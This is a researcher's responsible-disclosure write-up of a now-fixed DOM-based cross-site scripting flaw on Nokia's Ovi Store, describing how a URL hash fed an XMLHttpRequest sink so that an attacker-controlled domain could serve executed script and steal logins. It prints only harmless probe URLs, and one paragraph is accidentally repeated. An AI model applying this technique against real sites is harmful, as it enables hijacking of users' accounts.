Vulnerability Type: Cross Site Scripting
Vulnerable Domain: http://store.ovi.com/
Status : Fixed
Detailed Writeup : Last year , i reported a critical DOM Based Cross Site Scrtiping Vulnerability on the hompeage of nokia Ovi Store http://store.ovi.com/ . The website uses CORS (Cross Origin Resource Sharing)mechanism to load the content in a particular area(div) of the page via XMLHttpRequests . So lets look on one of the url :
[pastacode lang=”markup” manual=”http%3A%2F%2Fstore.ovi.com%2F%23%2Fapplications%3FcategoryId%3D14%0A” message=”” highlight=”” provider=”manual”/]
The location of the content to be loaded in the particular div is in the url means “Location.hash” . I use Dominator often. Its a very useful tool . So, i fuzzed the url with Domi and i got something like this:
1 Alert whose source is location.hash and sink is XMLHR.open . Pretty nice 🙂 . I opened the url in Google Chrome and in the console tab i get this:
The location of the content to be loaded in the particular div is in the url means “Location.hash” . I use Dominator often. Its a very useful tool . So, i fuzzed the url with Domi and i got something like this:
1 Alert whose source is location.hash and sink is XMLHR.open . Pretty nice 🙂 . I opened the url in Google Chrome and in the console tab i get this:
Tried to put some junk text just to know whats going on ? For example
[pastacode lang=”markup” manual=”http%3A%2F%2Fstore.ovi.com%2F%23%2Fjasminder%0A” message=”” highlight=”” provider=”manual”/]
will result in the following.
Since the sink was XMLHR.open , i tried to put my website after the hash. but..
Now there was a dedicated XHR sent to my domain. After bypassing the Same origin policy . I could get the javascript executed on site
This DOM Based XSS afftected the whole site . Below is the video POC of how i exploited this vulnerability to steal any user login details. Enjoy It 🙂
I got Nokia Lumia 820 as a reward for this vulnerability.
Thanks to the following people :
[pastacode lang=”markup” manual=”https%3A%2F%2Ftwitter.com%2Fkkotowicz%0Ahttps%3A%2F%2Ftwitter.com%2FWisecWisec%0Ahttps%3A%2F%2Ftwitter.com%2Fnetfuzzer” message=”” highlight=”” provider=”manual”/]